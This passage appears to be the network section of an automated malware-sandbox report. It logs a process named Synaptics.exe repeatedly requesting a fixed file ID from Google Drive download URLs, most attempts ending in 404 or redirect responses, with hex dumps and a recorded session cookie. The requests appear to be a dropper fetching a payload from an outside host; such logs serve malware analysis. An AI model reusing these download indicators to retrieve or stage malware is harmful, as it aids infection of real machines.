                                                                                                                              2024-12-30 10:48:24 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              79192.168.2.449868142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:24 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:24 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC4H4VR5w0vgfHNkE9QxlZz-m6NQDarExmjREo0agStsIkxyzWU8GDvChT-Nmp3XrYzIMKxoeSo
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-DJkHrQPF-B_uqIzBIMYD6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:24 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:24 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 41 53 41 34 75 33 73 74 6a 6b 4e 74 2d 43 65 50 71 77 47 4f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="uASA4u3stjkNt-CePqwGOw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:24 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              80192.168.2.449867142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:24 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-IENnczJHA5W5f0K-QVckWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              81192.168.2.449870142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:24 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7mxWd8Z6BWUCwv_CjW7Jcgxy7gNTRVncBmUB-gO7FfUu99lzjLLScBi0hkNYbZUgeL
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-YCAuPFvNnFEAmjuiGSBrHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 36 75 46 2d 6c 56 34 71 39 65 74 4b 31 69 2d 74 62 6e 30 52 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="j6uF-lV4q9etK1i-tbn0RQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              82192.168.2.449869142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:25 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-VhJeonbXaqmvVXOUYkbbCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              83192.168.2.449871142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:25 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-l6NJJ3l2VpqvY7VOqd_Faw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              84192.168.2.449872142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:25 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5UyZsF_mXlw-43fmeeAzOzQYum_fvH3N5b8ak9C_ESK7tsRE5uKSULguxfhO3MsJ1P
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-eou_f10_inLlsUM-_pvfKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 79 42 65 63 45 44 52 31 69 34 53 36 49 67 36 44 43 63 4e 4c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="2yBecEDR1i4S6Ig6DCcNLA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              85192.168.2.449874142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:25 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              86192.168.2.449875142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:25 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              87192.168.2.449876142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              88192.168.2.449877142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:26 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
